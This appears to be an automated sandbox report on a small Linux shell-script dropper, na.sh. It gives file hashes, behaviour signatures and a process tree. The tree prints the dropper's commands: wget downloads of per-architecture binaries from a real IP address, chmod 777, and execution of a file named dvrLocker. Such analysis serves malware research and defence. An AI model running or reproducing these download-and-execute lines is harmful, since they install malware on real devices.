Analysis

  • max time kernel
    150s
  • max time network
    133s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240611-en
  • resource tags
    arch:mips
    image:debian9-mipsbe-20240611-en
    kernel:4.9.0-13-4kc-malta
    locale:en-us
    os:debian-9-mips
    system
  • submitted
    10-10-2024 07:02

General

  • Target

    na.sh

  • Size

    372B

  • MD5

    6b2644c0adca68c54a53a79842eb3b3c

  • SHA1

    d26ec0f0fc70fcb713aba5fa56912809cefb8bc0

  • SHA256

    89e3309d765c4f00090a446b6599b23a3d2334aec380f52cb7d9c89da2683e6f

  • SHA512

    943667c0ddec5ed4ec3a8d66d8997078a9b04f3b48b937f5e3b339f039d53c495a27a3253c504edc22704c394bb197455ace2e1c45e17eeda806b3b4200fb90c

Malware Config

Signatures

  • File and Directory Permissions Modification (1 TTPs, 5 IoCs)

    Adversaries may modify file or directory permissions to evade defenses.

  • Deletes itself (1 IoCs)
  • Executes dropped EXE (5 IoCs)
  • Unexpected DNS network traffic destination (1 IoCs)

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Enumerates running processes

    Discovers information about currently running processes on the system.

  • Reads process memory (1 TTPs, 4 IoCs)

    Reads the memory of a process through the /proc virtual filesystem. This can be used to steal credentials.

  • Changes its process name (1 IoCs)
  • Reads runtime system information (64 IoCs)

    Reads data from the /proc virtual filesystem.

  • System Network Configuration Discovery (1 TTPs, 1 IoCs)

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory (1 IoCs)

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/na.sh
    /tmp/na.sh
    1⤵
    • Writes file to tmp directory
    PID:703
    • /bin/rm
      rm -rf dvrLocker
      2⤵
      PID:705
    • /usr/bin/wget
      wget http://185.157.247.125/c/empsl -O -
      2⤵
      PID:706
    • /bin/chmod
      chmod 777 dvrLocker
      2⤵
      • File and Directory Permissions Modification
      PID:724
    • /dvrLocker
      ./dvrLocker tplink.new
      2⤵
      • Executes dropped EXE
      PID:726
    • /usr/bin/wget
      wget http://185.157.247.125/c/emips -O -
      2⤵
      • System Network Configuration Discovery
      PID:728
    • /bin/chmod
      chmod 777 dvrLocker
      2⤵
      • File and Directory Permissions Modification
      PID:734
    • /dvrLocker
      ./dvrLocker tplink.new
      2⤵
      • Deletes itself
      • Executes dropped EXE
      • Reads process memory
      • Changes its process name
      • Reads runtime system information
      PID:736
    • /usr/bin/wget
      wget http://185.157.247.125/c/earm -O -
      2⤵
      PID:738
    • /bin/chmod
      chmod 777 dvrLocker
      2⤵
      • File and Directory Permissions Modification
      PID:740
    • /dvrLocker
      ./dvrLocker tplink.new
      2⤵
      • Executes dropped EXE
      PID:747
    • /bin/sh
      /bin/sh ./dvrLocker tplink.new
      2⤵
      PID:747
    • /usr/bin/wget
      wget http://185.157.247.125/c/earm7 -O -
      2⤵
      PID:749
    • /bin/chmod
      chmod 777 dvrLocker
      2⤵
      • File and Directory Permissions Modification
      PID:750
    • /dvrLocker
      ./dvrLocker tplink.new
      2⤵
      • Executes dropped EXE
      PID:753
    • /bin/sh
      /bin/sh ./dvrLocker tplink.new
      2⤵
      PID:753
    • /usr/bin/wget
      wget http://185.157.247.125/c/ex86 -O -
      2⤵
      PID:759
    • /bin/chmod
      chmod 777 dvrLocker
      2⤵
      • File and Directory Permissions Modification
      PID:760
    • /dvrLocker
      ./dvrLocker tplink.new
      2⤵
      • Executes dropped EXE
      PID:762
    • /bin/sh
      /bin/sh ./dvrLocker tplink.new
      2⤵
      PID:762

Downloads

  • /dvrLocker
    Filesize
    41KB
    MD5
    3cfc76868e26201ac03e0583b7c8aaba
    SHA1
    03436d9d090e1f944fecf60adc1e45f90df20c26
    SHA256
    8c825ecd4fff08b44d8334e022dc0d6eedbe9a1b61469e523025d7968be2e84d
    SHA512
    84add49907a7c8818abc31118e16e8becf3bb41bcf814139fe0c99617b9ff46dc228be8a319e3fd80f0a672bc056cb30bb75ff0a4ed03418cd06cc95ef5070b2

  • /dvrLocker
    Filesize
    40KB
    MD5
    c0b34d8a59f793b636b5424b8e96a64a
    SHA1
    d5eac6c7b3a5953ffcd642de9db2cd1c45463e96
    SHA256
    defb122644753c1493b140e9bb7b6df824197a475f39af66f50ae93190e43270
    SHA512
    57446ac19971a42d6dc72b0ce14e7771efed16b9da6b86102ec4540cdc16103557e48eb957a822543d825cada502700d8f225d4b47d93c5e43e7fd8c55ba25d4